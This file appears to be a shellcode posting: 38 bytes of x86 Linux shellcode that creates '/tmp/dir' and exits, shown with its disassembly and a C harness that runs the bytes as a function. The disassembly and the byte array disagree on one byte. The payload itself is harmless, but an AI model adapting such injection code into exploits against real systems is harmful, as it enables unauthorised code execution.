/*
Name   : 38 bytes sys_mkdir("/tmp/dir",1) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/


/*
gunslinger@localhost:~/shellcode$ objdump -d mkdir

mkdir:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060:	eb 17                	jmp    0x8048079
 8048062:	31 c0                	xor    %eax,%eax
 8048064:	31 db                	xor    %ebx,%ebx
 8048066:	31 d2                	xor    %edx,%edx
 8048068:	31 c9                	xor    %ecx,%ecx
 804806a:	b0 27                	mov    $0x27,%al
 804806c:	5b                   	pop    %ebx
 804806d:	b1 00                	mov    $0x0,%cl
 804806f:	cd 80                	int    $0x80
 8048071:	31 c0                	xor    %eax,%eax
 8048073:	b0 01                	mov    $0x1,%al
 8048075:	31 db                	xor    %ebx,%ebx
 8048077:	cd 80                	int    $0x80
 8048079:	e8 e4 ff ff ff       	call   0x8048062
 804807e:	2f                   	das    
 804807f:	74 6d                	je     0x80480ee
 8048081:	70 2f                	jo     0x80480b2
 8048083:	64                   	fs
 8048084:	69                   	.byte 0x69
 8048085:	72                   	.byte 0x72
gunslinger@localhost:~/shellcode$
*/

#include <stdio.h>

char shellcodedir[] =    "\xeb\x17"             
			 "\x31\xc0"          
			 "\x31\xdb"          
			 "\x31\xd2"  
			 "\x31\xc9"  
			 "\xb0\x27"  
			 "\x5b"      
			 "\xb1\x01"  
			 "\xcd\x80"  
			 "\x31\xc0"
			 "\xb0\x01"
			 "\x31\xdb"
			 "\xcd\x80"
			 "\xe8\xe4\xff\xff\xff"
			 "\x2f"
			 "\x74\x6d"
			 "\x70\x2f"
			 "\x64"
			 "\x69"
			 "\x72";
		
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) shellcodedir;
  (int)(*func)();
}